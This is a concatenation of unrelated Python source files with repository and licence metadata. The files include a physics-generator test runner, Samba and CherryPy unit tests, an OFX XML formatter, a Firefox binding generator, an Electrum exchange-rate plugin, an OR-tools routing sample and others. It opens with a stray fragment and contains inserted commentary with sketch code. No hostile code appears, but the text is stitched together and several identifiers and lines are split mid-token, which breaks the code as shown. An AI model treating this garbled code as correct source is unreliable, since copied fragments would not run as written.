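print(node.name, node.asname)  # json j
# repr lists every field and location slot declared on the class.
print(repr(node))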
rkycia/GenEx
test.py
Python
gpl-3.0
4,308
0.036444
#! /usr/bin/env python

# @brief Script to run appropriate tests.

import os
import distutils.core
from shutil import rmtree, copyfile

"""Available tests dictionary in the format no_of_test : name_of_test"""
tests = {0:"default Generator.dat with lots of comments and explanations",
	1:"RHIC pt_pi, eta_pi; tecm = 200GeV; Lambda2=1",
	2:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1",
	3:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6",
	4:"RHIC pt_pi, eta_pi; tecm = 500GeV; Lambda2=1",
	5:"RHIC pt_pi,
eta_pi, t1, t2; tecm = 500GeV; Lambda2=1", 6:"RHIC pt_pi, eta_pi, t1, t2; tecm = 500GeV; Lambda2=1.6", 7:"LHC pt_pi, eta_pi; tecm =
7TeV, 1st; Lambda2=1.2", 8:"LHC pt_pi, eta_pi; tecm = 7TeV, 1st; Lambda2=1.6", 9:"LHC pt_pi, eta_pi; tecm = 7TeV, 2nd; Lambda2=1.2", 10:"LHC pt_pi, eta_pi; tecm = 7TeV, 2nd; Lambda2=1.6", 11:"LHC pt_K, eta_K; tecm = 7TeV, 1st; Lambda2=1.2", 12:"LHC pt_K, eta_K; tecm = 7TeV, 1st; Lambda2=1.6", 13:"LHC pt_K, eta_K; tecm = 7TeV, 2nd; Lambda2=1.2", 14:"LHC pt_K, eta_K; tecm = 7TeV, 2nd; Lambda2=1.6", 15:"2to5; y_pi, tecm = 200GeV", 16:"CPS, N=5, y_pi, tecm = 200GeV", 17:"2to5; y_pi, t, tecm = 200GeV", 18:"CPS, N=5, y_pi, t, tecm = 200GeV", 19:"CPS, N=5, Exploration Cuts, y_pi, t, tecm = 200GeV", 20:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; LS method of Phase Space generation", 21:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; 2toN (N=4) method of Phase Space generation", 22:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 1000 = nSampl, y in [-8;8]", 23:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000, nSampl = 1000, y in [-8;8]", 24:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000, nSampl = 10000, y in [-8;8]", 25:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000, nSampl = 1000, y in [-2;2]", 26:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000 = nSampl, y in [-2;2]" } def prepareTest( number, testDir = './Tests', testName = 'test', configFile = 'Generator.dat' ): """Prepare configuration file by picking one of the test file from testDir @param testDir dir containing tests @param testName basename of test @param configFile configuration file for generator """ #save old config file copyfile(configFile, "OLD"+configFile) #copy configuration files fromDirectory = testDir + '/' + testName + str(number) copyfile(fromDirectory, configFile) return testDir def rmDir( directory = "./" ): """Remove directory and all its content @param directory base directory for project """ rmtree( directory ) def runMake( option, runDir = './'): """Run make with option in given directory @param option option for make @param runDir directory in which make will be executed """ os.system( 'make -C ' + runDir + ' ' + option) def showTests( testDict ): """Show tests in dictionary @param testDict dictionary with tests in the format no_of_test : name_of_test """ print("#########################") print("AVAIBLE TESTS:") print("#########################") for key in testDict: print( str(key) + ' -- '+ str(testDict[key]) ) print("#########################") def pickTest( testDict ): """Allows user to pick option from the keys of dictionary and returns it @param testDict dictionary with tests in the format no_of_test : name_of_test """ finish = False while not finish: showTests(testDict) input_var = input("Enter option: ") print ("you entered " + str(input_var)) if input_var in testDict.keys(): finish = True return input_var def main(): """Simple test suit for GenEx. It copy Core GenEx files and selected configuration files to one test directory and then run it and remove test directory""" testNo = pickTest( tests ) print("Preparing generator...") prepareTest(testNo) print("...DONE") print("Start test...") runMake('run') print("...DONE") print("Cleaning dir...") runMake('clean') print("...DONE") if __name__ == "__main__": main()
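One caveat: under Python 3, input() returns a string while the tests dict is keyed by ints, so the membership test in pickTest can never succeed. A type-safe sketch of the picker, assuming Python 3 is the target:

def pick_test(test_dict):
    # Like pickTest above, but coerces the typed option to int first.
    while True:
        for key, name in test_dict.items():
            print(str(key) + ' -- ' + str(name))
        try:
            option = int(input("Enter option: "))
        except ValueError:
            continue
        if option in test_dict:
            return option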
olof/svtplay-dl
lib/svtplay_dl/service/tests/oppetarkiv.py
Python
mit
591
0.001692
#!/usr/bin/python
# ex:ts=4:sw=4:
sts=4:et # -*- tab-width: 4; c-basic-offset: 4; indent-tabs-mode: nil -*- # The unittest framwork doesn't play nice with pylint: # pylint: disable-msg=C0103 from __future__ import absolute_import import unittest from svtplay_dl.service.oppetarkiv import OppetArkiv from svtplay_dl.service.tests import HandlesURLsTestMixin class handlesTest(unittest.TestCase, HandlesURLsTestMixin): service = OppetArkiv urls = {"ok": ["http://www.oppetarkiv.se/video/1129844/jacobs-stege-avsnitt-1-av-1"], "bad": ["http://www.svtplay.se/video/1090393/del-9"]}
wimberosa/samba
source4/scripting/python/samba/tests/core.py
Python
gpl-3.0
2,175
0.004598
#!/usr/bin/env python # Unix SMB/CIFS implementation. # Copyright (C) Jelmer Vernooij <jelmer@samba.org> 2007-2008 # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # """Samba Python tests.""" import ldb import os import samba from samba.tests import TestCase, TestCaseInTempDir class SubstituteVarTestCase(TestCase): def test_empty(self): self.assertEquals("", samba.substitute_var("", {})) def test_nothing(self): self.assertEquals("foo bar", samba.substitute_var("foo bar", {"bar": "bla"})) def test_replace(self): self.assertEquals("foo bla", samba.substitute_var("foo ${bar}", {"bar": "bla"})) def test_broken(self): self.assertEquals("foo ${bdkjfhsdkfh sdkfh ", samba.substitute_var("foo ${bdkjfhsdkfh sdkfh ", {"bar": "bla"})) def test_unknown_var(self): self.assertEquals("foo ${bla} gsff", samba.substitute_var("foo ${bla} gsff", {"bar": "bla"})) def test_check_all_substituted(self): samba.check_all_substituted("nothing to see here") self.assertRaises(Exception, samba.check_all_substituted, "Not subsituted: ${FOOBAR}") class LdbExtensionTests(TestCaseInTempDir): def test_searchone(self): path = self.tempdir + "/searchone.ldb" l = samba.Ldb(path) try: l.add({"dn": "foo=dc", "bar": "bla"}) sel
f.assertEquals("bla", l.searchone(basedn=ldb.Dn(l, "foo=dc"), attribute="bar")) finally: del l
os.unlink(path)
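The tests above fix substitute_var's contract: replace ${name} when the name is known, and leave unknown or unterminated references untouched. A minimal regex sketch that satisfies those cases; it is not Samba's actual implementation.

import re

def substitute_var_sketch(text, values):
    def repl(match):
        name = match.group(1)
        # Unknown names stay verbatim, matching test_unknown_var.
        return str(values[name]) if name in values else match.group(0)
    # An unterminated ${... never matches, matching test_broken.
    return re.sub(r'\$\{(\w+)\}', repl, text)

assert substitute_var_sketch("foo ${bar}", {"bar": "bla"}) == "foo bla"
assert substitute_var_sketch("foo ${bla} gsff", {"bar": "bla"}) == "foo ${bla} gsff"
assert substitute_var_sketch("foo ${bdkjfhsdkfh sdkfh ", {}) == "foo ${bdkjfhsdkfh sdkfh "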
henriquebastos/fixofx
fixofx/ofx/document.py
Python
apache-2.0
3,289
0.001216
#coding: utf-8 # Copyright 2005-2010 Wesabe, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ofx.document - abstract OFX document. # import xml.sax.saxutils as sax class Document: def as_xml(self, original_format=None, date_format=None): """Formats this document as an OFX 2.0 XML document.""" xml = "" # NOTE: Encoding in OFX, particularly in OFX 1.02, # is kind of a mess. The OFX 1.02 spec talks about "UNICODE" # as a supported encoding, which the OFX 2.0 spec has # back-rationalized to "UTF-8". The "US-ASCII" encoding is # given as "USASCII". Yet the 1.02 spec acknowledges that # not everyone speaks English nor uses UNICODE, so they let # you throw any old encoding in there you'd like. I'm going # with the idea that if the most common encodings are named # in an OFX file, they should be translated to "real" XML # encodings, and if no encoding is given, UTF-8 (which is a # superset of US-ASCII) should be assumed; but if a named # encoding other than USASCII or 'UNICODE' is given, that # should be preserved. I'm also adding a get_encoding() # method so that we can start to survey what encodings # we're actually seeing, and use that to maybe be smarter # about this in the future. #forcing encoding to utf-8 encoding = "UTF-8" xml += """<?xml version="1.0" encoding="%s"?>\n""" % encoding xml += """<?OFX OFXHEADER="200" VERSION="200" """ + \ """SECURITY="%s" OLDFILEUID="%s" NEWFILEUID="%s"?>\n""" % \ (self.parse_dict["header"]["SECURITY"], self.parse_dict["header"]["OLDFILEUID"], self.parse_dict["header"]["
NEWFILEUID"]) if original_format is not None: xml += """
<!-- Converted from: %s -->\n""" % original_format if date_format is not None: xml += """<!-- Date format was: %s -->\n""" % date_format taglist = self.parse_dict["body"]["OFX"][0].asList() xml += self._format_xml(taglist) return xml def _format_xml(self, mylist, indent=0): xml = "" indentstring = " " * indent tag = mylist.pop(0) if len(mylist) > 0 and isinstance(mylist[0], list): xml += "%s<%s>\n" % (indentstring, tag) for value in mylist: xml += self._format_xml(value, indent=indent + 2) xml += "%s</%s>\n" % (indentstring, tag) elif len(mylist) > 0: # Unescape then reescape so we don't wind up with '&amp;lt;', oy. value = sax.escape(sax.unescape(mylist[0])) xml += "%s<%s>%s</%s>\n" % (indentstring, tag, value, tag) return xml
sergecodd/FireFox-OS
B2G/gecko/dom/bindings/BindingGen.py
Python
apache-2.0
2,361
0.003388
# This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this file, # You can obtain one at http://mozilla.org/MPL/2.0/. import os import cPickle import WebIDL from Configuration import * from Codegen import CGBindingRoot, replaceFileIfChanged # import Codegen in general, so we can set a variable on it import Codegen def generate_binding_header(config, outputprefix, webidlfile): """ |config| Is the configuration object. |outputprefix| is a prefix to use for the header guards and filename. """ filename = outputprefix + ".h" root = CGBindingRoot(config, outputprefix, webidlfile) if replaceFileIfChanged(filename, root.declare()): print "Generating binding header: %s" % (filename) def generate_binding_cpp(config, outputprefix, webidlfile): """ |config| Is the configuration object. |outputprefix| is a prefix to use for the header guards and filename. """ filename = outputprefix + ".cpp" root = CGBindingRoot(config, outputprefix, webidlfile) if replaceFileIfChanged(filename, root.define()): print "Generating binding implementation: %s" % (filename) def main(): # Parse arguments. from optparse import OptionParser usagestring = "usage: %prog [header|cpp] configFile outputPrefix webIDLFile" o = OptionParser(usage=usagestring) o.add_option("--verbose-errors", action='store_true', default=False, help="When an error happens, display the Python traceback.") (options, args) = o.parse_args() if len(args) != 4 or (args[0] != "header" and args[0] != "cpp"): o.error(usagestring) buildTarget = args[0] configFile = os.path.normpath(args[1]) outputPrefix = args[2] webIDLFile = os.path.normpath(args[3]) # Load the parsing results f = open('ParserResults.pkl', 'rb') parserData = cPickle.load(f) f.clo
se() # Create the configuration data. config = Configuration(configFile, parserData) # Generate the prototype classes. if buildTarget == "header": generate_binding_header(config, outputPrefix, webIDLFile); elif buildTarget == "cpp": generate_binding_cpp(config, outputPrefix, webIDLFile); else: assert False # not reached if __name__ == '__main__
': main()
marlengit/electrum198
plugins/exchange_rate.py
Python
gpl-3.0
18,608
0.00489
from PyQt4.QtGui import * from PyQt4.QtCore import * import datetime import decimal import httplib import json import threading import re from decimal import Decimal from electrum.plugins import BasePlugin from electrum.i18n import _ from electrum_gui.qt.util import * EXCHANGES = ["BitcoinAverage", "BitcoinVenezuela", "BitPay", "Blockchain", "BTCChina", "CaVirtEx", "Coinbase", "CoinDesk", "LocalBitcoins", "Winkdex"] class Exchanger(threading.Thread): def __init__(self, parent): threading.Thread.__init__(self) self.daemon = True self.parent = parent self.quote_currencies = None self.lock = threading.Lock() self.query_rates
= threading.Event() self.use_exchange = self.parent.config.get('use_exchange', "Blockchain") self.parent.exchanges = EXCHANGES self.parent.currencies = ["EUR","GBP","USD"] self.parent.win.emit(SIGNAL("refresh_exchanges_combo()")) self.parent.win.emit(SIGNAL("refresh_currencies_combo()")) self.is_running = False
def get_json(self, site, get_string): try: connection = httplib.HTTPSConnection(site) connection.request("GET", get_string) except Exception: raise resp = connection.getresponse() if resp.reason == httplib.responses[httplib.NOT_FOUND]: raise try: json_resp = json.loads(resp.read()) except Exception: raise return json_resp def exchange(self, btc_amount, quote_currency): with self.lock: if self.quote_currencies is None: return None quote_currencies = self.quote_currencies.copy() if quote_currency not in quote_currencies: return None if self.use_exchange == "CoinDesk": try: resp_rate = self.get_json('api.coindesk.com', "/v1/bpi/currentprice/" + str(quote_currency) + ".json") except Exception: return return btc_amount * decimal.Decimal(str(resp_rate["bpi"][str(quote_currency)]["rate_float"])) return btc_amount * decimal.Decimal(quote_currencies[quote_currency]) def stop(self): self.is_running = False def update_rate(self): self.use_exchange = self.parent.config.get('use_exchange', "Blockchain") update_rates = { "BitcoinAverage": self.update_ba, "BitcoinVenezuela": self.update_bv, "BitPay": self.update_bp, "Blockchain": self.update_bc, "BTCChina": self.update_CNY, "CaVirtEx": self.update_cv, "CoinDesk": self.update_cd, "Coinbase": self.update_cb, "LocalBitcoins": self.update_lb, "Winkdex": self.update_wd, } try: update_rates[self.use_exchange]() except KeyError: return def run(self): self.is_running = True while self.is_running: self.query_rates.clear() self.update_rate() self.query_rates.wait(150) def update_cd(self): try: resp_currencies = self.get_json('api.coindesk.com', "/v1/bpi/supported-currencies.json") except Exception: return quote_currencies = {} for cur in resp_currencies: quote_currencies[str(cur["currency"])] = 0.0 with self.lock: self.quote_currencies = quote_currencies self.parent.set_currencies(quote_currencies) def update_wd(self): try: winkresp = self.get_json('winkdex.com', "/static/data/0_600_288.json") ####could need nonce value in GET, no Docs available except Exception: return quote_currencies = {"USD": 0.0} ####get y of highest x in "prices" lenprices = len(winkresp["prices"]) usdprice = winkresp["prices"][lenprices-1]["y"] try: quote_currencies["USD"] = decimal.Decimal(usdprice) with self.lock: self.quote_currencies = quote_currencies except KeyError: pass self.parent.set_currencies(quote_currencies) def update_cv(self): try: jsonresp = self.get_json('www.cavirtex.com', "/api/CAD/ticker.json") except Exception: return quote_currencies = {"CAD": 0.0} cadprice = jsonresp["last"] try: quote_currencies["CAD"] = decimal.Decimal(cadprice) with self.lock: self.quote_currencies = quote_currencies except KeyError: pass self.parent.set_currencies(quote_currencies) def update_CNY(self): try: jsonresp = self.get_json('data.btcchina.com', "/data/ticker") except Exception: return quote_currencies = {"CNY": 0.0} cnyprice = jsonresp["ticker"]["last"] try: quote_currencies["CNY"] = decimal.Decimal(cnyprice) with self.lock: self.quote_currencies = quote_currencies except KeyError: pass self.parent.set_currencies(quote_currencies) def update_bp(self): try: jsonresp = self.get_json('bitpay.com', "/api/rates") except Exception: return quote_currencies = {} try: for r in jsonresp: quote_currencies[str(r["code"])] = decimal.Decimal(r["rate"]) with self.lock: self.quote_currencies = quote_currencies except KeyError: pass self.parent.set_currencies(quote_currencies) def update_cb(self): try: jsonresp = self.get_json('coinbase.com', "/api/v1/currencies/exchange_rates") except Exception: return 
quote_currencies = {} try: for r in jsonresp: if r[:7] == "btc_to_": quote_currencies[r[7:].upper()] = self._lookup_rate_cb(jsonresp, r) with self.lock: self.quote_currencies = quote_currencies except KeyError: pass self.parent.set_currencies(quote_currencies) def update_bc(self): try: jsonresp = self.get_json('blockchain.info', "/ticker") except Exception: return quote_currencies = {} try: for r in jsonresp: quote_currencies[r] = self._lookup_rate(jsonresp, r) with self.lock: self.quote_currencies = quote_currencies except KeyError: pass self.parent.set_currencies(quote_currencies) # print "updating exchange rate", self.quote_currencies["USD"] def update_lb(self): try: jsonresp = self.get_json('localbitcoins.com', "/bitcoinaverage/ticker-all-currencies/") except Exception: return quote_currencies = {} try: for r in jsonresp: quote_currencies[r] = self._lookup_rate_lb(jsonresp, r) with self.lock: self.quote_currencies = quote_currencies except KeyError: pass self.parent.set_currencies(quote_currencies) def update_bv(self): try: jsonresp = self.get_json('api.bitcoinvenezuela.com', "/") except Exception: return quote_currencies = {} try: for r in jsonresp["BTC"]: quote_currencies[r] = Decimal(jsonresp["BTC"][r]) with self.lock: self.quote_currencies = quote_currencies except KeyError: pass self.parent.set_currencies(quote_currencies) def update_ba(self): try: jsonresp = self.get_json('api.bitcoinaverage.com', "/ticker/global/all") except Exception: return quote_currencies = {} try:
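Every update_* method above has the same shape: fetch JSON over HTTPS, extract per-currency rates, and swap the result in under the lock. A compact Python 3 sketch of that shape; the URL and response format are placeholders, not a real exchange API, and the plugin itself uses Decimal rather than float.

import json
import threading
import urllib.request

class MiniExchanger:
    def __init__(self):
        self.lock = threading.Lock()
        self.quote_currencies = None

    def update(self, url):
        # Hypothetical endpoint assumed to return {"USD": "123.4", ...}.
        with urllib.request.urlopen(url) as resp:
            rates = json.loads(resp.read())
        parsed = {cur: float(val) for cur, val in rates.items()}
        with self.lock:
            self.quote_currencies = parsed

    def exchange(self, btc_amount, currency):
        with self.lock:
            rates = dict(self.quote_currencies or {})
        return btc_amount * rates[currency] if currency in rates else None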
evilhero/mylar
lib/cherrypy/test/test_etags.py
Python
gpl-3.0
3,071
0.003256
import cherrypy from cherrypy.test import helper class ETagTest(helper.CPWebCase): def setup_server(): class Root: def resource(self): return "Oh wah ta goo Siam." resource.exposed = True def fail(self, code): code = int(code) if 300 <= code <= 399: raise cherrypy.HTTPRedirect([], code) else: raise cherrypy.HTTPError(code) fail.exposed = True def unicoded(self): return u'I am a \u1ee4nicode string.' unicoded.exposed = True unicoded._cp_config = {'tools.encode.on': True} conf = {'/': {'tools.etags.on': True, 'tools.etags.autotags': True, }} cherrypy.tree.mount(Root(), config=conf) setup_server = staticmethod(setup_s
erver) def test_etags(self): self.getPage("/resource") self.assertStatus('200 OK') self.assertHeader('Content-Type', 'text/html;charset=utf-8') self.assertBody('Oh wah ta goo Siam.') etag = self.assertHeader('ETag') # Test If-Match (both valid and invalid)
self.getPage("/resource", headers=[('If-Match', etag)]) self.assertStatus("200 OK") self.getPage("/resource", headers=[('If-Match', "*")]) self.assertStatus("200 OK") self.getPage("/resource", headers=[('If-Match', "*")], method="POST") self.assertStatus("200 OK") self.getPage("/resource", headers=[('If-Match', "a bogus tag")]) self.assertStatus("412 Precondition Failed") # Test If-None-Match (both valid and invalid) self.getPage("/resource", headers=[('If-None-Match', etag)]) self.assertStatus(304) self.getPage("/resource", method='POST', headers=[('If-None-Match', etag)]) self.assertStatus("412 Precondition Failed") self.getPage("/resource", headers=[('If-None-Match', "*")]) self.assertStatus(304) self.getPage("/resource", headers=[('If-None-Match', "a bogus tag")]) self.assertStatus("200 OK") def test_errors(self): self.getPage("/resource") self.assertStatus(200) etag = self.assertHeader('ETag') # Test raising errors in page handler self.getPage("/fail/412", headers=[('If-Match', etag)]) self.assertStatus(412) self.getPage("/fail/304", headers=[('If-Match', etag)]) self.assertStatus(304) self.getPage("/fail/412", headers=[('If-None-Match', "*")]) self.assertStatus(412) self.getPage("/fail/304", headers=[('If-None-Match', "*")]) self.assertStatus(304) def test_unicode_body(self): self.getPage("/unicoded") self.assertStatus(200) etag1 = self.assertHeader('ETag') self.getPage("/unicoded", headers=[('If-Match', etag1)]) self.assertStatus(200) self.assertHeader('ETag', etag1)
briancurtin/python-openstacksdk
examples/cluster/profile.py
Python
apache-2.0
2,100
0
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from exampl
es.connect import FLAVOR_NAME from examples.connect import IMAGE_NAME from examples.connect import NETWORK_NAME from examples.connect import SERVER_NAME """ Managing profiles in the Cluster service. For a full guide see https://developer.openstack.org/sdks/python/openstacksdk/users/guides/cluster.html """ def list_profiles(conn): print("List Profiles:") for profile in conn.cluster.profiles(): print(profile.to_dict()) fo
r profile in conn.cluster.profiles(sort='name:asc'): print(profile.to_dict()) def create_profile(conn): print("Create Profile:") spec = { 'profile': 'os.nova.server', 'version': 1.0, 'properties': { 'name': SERVER_NAME, 'flavor': FLAVOR_NAME, 'image': IMAGE_NAME, 'networks': { 'network': NETWORK_NAME } } } profile = conn.cluster.create_profile('os_server', spec) print(profile.to_dict()) def get_profile(conn): print("Get Profile:") profile = conn.cluster.get_profile('os_server') print(profile.to_dict()) def find_profile(conn): print("Find Profile:") profile = conn.cluster.find_profile('os_server') print(profile.to_dict()) def update_profile(conn): print("Update Profile:") profile = conn.cluster.update_profile('os_server', name='old_server') print(profile.to_dict()) def delete_profile(conn): print("Delete Profile:") conn.cluster.delete_profile('os_server') print("Profile deleted.")
adviti/melange
thirdparty/google_appengine/lib/django_1_2/tests/regressiontests/admin_ordering/models.py
Python
apache-2.0
224
0.004464
# coding: utf-8 from django.db import models class Band(models.Model): name = models.CharField(
max_length=100) bio = models.TextField() rank = models.IntegerField() class Meta: order
ing = ('name',)
mame98/ArchSetup
scripts/debug-preview.py
Python
gpl-3.0
1,383
0.005061
#!/usr/bin/env python3 import os import sys sys.path.insert(1, os.path.join(sys.path[0], '..')) from SetupTools.SetupConfig import SetupConfig from Interface.Interface import Interface import importlib import logging class Previewer: def __init__(self): logging.basicConfig(filename='ArchSetup.preview.log', level=logging.DEBUG, format='%(asctime)s - [%(relativeCreated)6d] - %(name)s - %(levelname)s - %(message)s') self.setupconfig = SetupConfig() self.interface = Interface(self.callback) self.interface.loop() def callback(self, event): if event == 'init': self.windows = [] self.window_index = 0 for x in sys.argv[1:]: i = importlib.import_module("Interface.
Windows."+x) cl = getattr(i, x) self.windows.append(cl(self.callback, self.setupconfig)) self.interface.addwin(self.windows[self.window_index]) elif event == 'prev': self.window_index -= 1 self.interface.addwin(self.windows[self.window_index]) elif event == 'next': self.window_index += 1 if self.window_index == len(self.windows): self.interface.exit()
return self.interface.addwin(self.windows[self.window_index]) if __name__ == "__main__": Previewer()
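The previewer above leans on a dynamic-import idiom worth isolating: importlib.import_module() loads a window module by dotted name, then getattr() pulls out the class of the same name. A minimal sketch of just that idiom; the module path and class name below are hypothetical.

import importlib

def load_window_class(name):
    # e.g. name == "WelcomeWindow" loads Interface.Windows.WelcomeWindow
    # and returns its WelcomeWindow class (hypothetical names)
    module = importlib.import_module("Interface.Windows." + name)
    return getattr(module, name)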
google/or-tools
ortools/constraint_solver/samples/vrp_tokens.py
Python
apache-2.0
6,133
0.000326
#!/usr/bin/env python3 # Copyright 2010-2021 Google LLC # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Simple VRP with special locations which need to be visited at end of the route.""" # [START import] from ortools.constraint_solver import routing_enums_pb2 from ortools.constraint_solver import pywrapcp # [END import] def create_data_model(): """Stores the data for the problem.""" data = {} # Special location don't consume token, while regular one consume one data['tokens'] = [ 0, # 0 depot 0, # 1 special node 0, # 2 special node 0, # 3 special node 0, # 4 special node 0, # 5 special node -1, # 6 -1, # 7 -1, # 8 -1, # 9 -1, # 10 -1, # 11 -1, # 12 -1, # 13 -1, # 14 -1, # 15 -1, # 16 -1, # 17 -1, # 18 ] # just need to be big enough, not a limiting factor data['vehicle_tokens'] = [20, 20, 20, 20] data['num_vehicles'] = 4 data['depot'] = 0 return data def print_solution(manager, routing, solution): """Prints solution on console.""" print(f'Objective: {solution.ObjectiveValue()}') token_dimension = routing.GetDimensionOrDie('Token') total_distance = 0 total_token = 0 for vehicle_id in range(manager.GetNumberOfVehicles()): plan_output = f'Route for vehicle {vehicle_id}:\n' index = routing.Start(vehicle_id) total_token += solution.Value(token_dimension.CumulVar(index)) route_distance = 0 route_token = 0 while not routing.IsEnd(index): node_index = manager.IndexToNode(index) token_var = token_dimension.CumulVar(index) route_token = solution.Value(token_var) plan_output += f' {node_index} Token({route_token}) -> ' previous_index = index index = solution.Value(routing.NextVar(index)) route_distance += routing.GetArcCostForVehicle( previous_index, index, vehicle_id) node_index = manager.IndexToNode(index) token_var = token_dimension.CumulVar(index) route_token = solution.Value(token_var) plan_output += f' {node_index} Token({route_token})\n' plan_output += f'Distance of the route: {route_distance}m\n' total_distance += route_distance print(plan_output) print('Total distance of all routes: {}m'.format(total_distance)) print('Total token of all routes: {}'.format(total_token)) def main(): """Solve the CVRP problem.""" # Instantiate the data problem. data = create_data_model() # Create the routing index manager. manager = pywrapcp.RoutingIndexManager(len(data['tokens']), data['num_vehicles'], data['depot']) # Create Routing Model. routing = pywrapcp.RoutingModel(manager) # Create and register a transit callback. def distance_callback(from_index, to_index): """Returns the distance between the two nodes.""" del from_index del to_index return 10 transit_callback_index = routing.RegisterTransitCallback(distance_callback) routing.AddDimension( transit_callback_index, 0, # null slack 3000, # maximum distance per vehicle True, # start cumul to zero 'distance') distance_dimension = routing.GetDimensionOrDie('distance') distance_dimension.SetGlobalSpanCostCoefficient(100) # Define cost of each arc. routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index) # Add Token constraint. 
def token_callback(from_index): """Returns the number of token consumed by the node.""" # Convert from routing variable Index to tokens NodeIndex. from_node = manager.IndexToNode(from_index) return data['tokens'][from_node] token_callback_index = routing.RegisterUnaryTransitCallback(token_callback) routing.AddDimensionWithVehicleCapacity( token_callback_index, 0, # null capacity slack data['vehicle_tokens'], # vehicle maximum tokens False, # start cumul to zero 'Token') # Add constraint: special node can only be visited if token remaining is zero token_dimension = routing.GetDimensionOrDie('Token') for node in range(1, 6): index = manager.NodeToIndex(node) routing.solver().Add(token_dimension.CumulVar(index) == 0) # Instantiate route start and end times to produce feasible times. # [START depot_start_end_times] for i in range(manager.GetNumberOfVehicles()): routing.AddVariableMinimizedByFinalizer( token_dimension.CumulVar(routing.Start(i))) routing.AddVariableMinimizedByFinalizer( token_dimension.CumulVar(routing.End(i))) # [END depot_start_end_times] # Setting first solution heuristic. search_parameters = pywrapcp.DefaultRoutingSearchParameters() search_parameters.first_solution_strategy = ( routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC) search_parameters.local_search_metaheuristic = ( routing_enums_pb2.LocalSearchMetaheuristic.GUIDED_LOCAL_SEARCH) search_para
meters.time_limit.FromSeconds(1) # Solve the problem. solution = routing.SolveWithParameters(search_parameters) # Print solution on console. # [START print_solution] if solution:
print_solution(manager, routing, solution) else: print('No solution found !') # [END print_solution] if __name__ == '__main__': main()
kevthehermit/viper
viper/common/autorun.py
Python
bsd-3-clause
1,981
0.002019
# -*- coding: utf-8 -*- # This file is part of Viper - https://github.com/viper-framework/viper # See the file 'LICENSE' for copying permission. from viper.common.out import print_info from viper.common.out import print_error from viper.common.out import print_output from viper.core.plugins import __modules__ from viper.core.session import __sessions__ from viper.core.database import Database from viper.core.config import __config__ from viper.core.storage import get_sample_path cfg = __config__ def parse_commands(data): root = '' args = [] words = data.split() root = words[0] if len(words) > 1: args = words[1:] return root, args def autorun_module(file_hash): if not file_hash: return if not __sessions__.is_set(): __sessions__.new(get_sample_path(file_hash)) for cmd_line in cfg.autorun.commands.split(','): split_commands = cmd_line.split(';') for split_command in split_commands: split_command = split_command.strip()
if not split_command: continue root, args = parse_commands(split_command) try: if root in __modules__: print_info("Running command \"{0}\"".format(split_command)) module = __modules__[root]['obj']() module.set_command
line(args)
                    module.run()

                    if cfg.modules.store_output and __sessions__.is_set():
                        Database().add_analysis(file_hash, split_command, module.output)
                    if cfg.autorun.verbose:
                        print_output(module.output)
                    del module.output[:]
                else:
                    print_error("\"{0}\" is not a valid command. Please check your viper.conf file.".format(cmd_line))
            except Exception:
                print_error("Viper was unable to complete the command {0}".format(cmd_line))
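parse_commands() above is a plain whitespace split into a module name and its arguments; a quick illustration with a hypothetical command string:

root, args = parse_commands("yara scan -t")  # "yara scan -t" is a made-up example
assert root == "yara"
assert args == ["scan", "-t"]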
alxgu/ansible
lib/ansible/modules/cloud/amazon/lambda_facts.py
Python
gpl-3.0
13,097
0.003054
#!/usr/bin/python # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: lambda_facts short_description: Gathers AWS Lambda function details as Ansible facts description: - Gathers various details related to Lambda functions, including aliases, versions and event source mappings. Use module M(lambda) to manage the lambda function itself, M(lambda_alias) to manage function aliases and M(lambda_event) to manage lambda event source mappings. version_added: "2.2" options: query: description: - 